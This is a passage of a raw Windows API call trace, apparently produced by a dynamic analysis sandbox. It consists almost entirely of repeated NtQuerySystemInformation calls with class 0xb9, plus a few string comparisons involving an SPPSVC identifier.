Length=0x0, ResultLength=0x0) [0210.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0210.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0210.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0210.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0210.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd460, Length=0x20, ResultLength=0x0) [0210.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x38, ResultLength=0x0) [0210.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0210.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd470, Length=0x20, ResultLength=0x0) [0210.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd470, Length=0x20, ResultLength=0x0) [0210.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d8, Length=0x50, ResultLength=0x0) [0210.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x38, ResultLength=0x0) [0210.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd730, Length=0x28, ResultLength=0x0) [0210.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd730, Length=0x28, ResultLength=0x0) [0210.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd730, Length=0x28, ResultLength=0x0) [0210.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd730, Length=0x28, ResultLength=0x0) [0210.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x28, ResultLength=0x0) [0210.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x38, ResultLength=0x0) [0210.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x28, ResultLength=0x0) [0210.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x28, ResultLength=0x0) [0210.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x38, ResultLength=0x0) [0210.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x20, ResultLength=0x0) [0210.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0210.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0210.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0210.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x38, ResultLength=0x0) [0210.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x20, ResultLength=0x0) [0210.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd710, Length=0x20, ResultLength=0x0) [0210.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd710, Length=0x20, ResultLength=0x0) [0210.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd880, Length=0x50, ResultLength=0x0) [0210.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0210.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0210.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0210.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0210.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0210.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x28, ResultLength=0x0) [0210.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0210.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0210.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0210.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0210.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x20, ResultLength=0x0) [0210.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0210.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0210.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0210.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0210.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x20, ResultLength=0x0) [0210.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0210.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0210.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.544] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd868, Length=0x50, ResultLength=0x0) [0210.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x28, ResultLength=0x0) [0210.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x28, ResultLength=0x0) [0210.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0210.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0210.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0210.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0210.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0210.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x38, ResultLength=0x0) [0210.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0210.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0210.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0210.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb78, Length=0x50, ResultLength=0x0) [0210.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaf0, Length=0x28, ResultLength=0x0) [0210.555] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb78, Length=0x50, ResultLength=0x0) [0210.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb78, Length=0x50, ResultLength=0x0) [0210.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x50, ResultLength=0x0) [0210.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0210.556] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x50, ResultLength=0x0) [0210.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x50, ResultLength=0x0) [0210.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x50, ResultLength=0x0) [0210.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x38, ResultLength=0x0) [0210.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x28, ResultLength=0x0) [0210.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x28, ResultLength=0x0) [0210.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x28, ResultLength=0x0) [0210.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd830, Length=0x28, ResultLength=0x0) [0210.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x38, ResultLength=0x0) [0210.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0210.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0210.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x38, ResultLength=0x0) [0210.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd810, Length=0x20, ResultLength=0x0) [0210.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x20, ResultLength=0x0) [0210.568] NtQuerySystemInformation 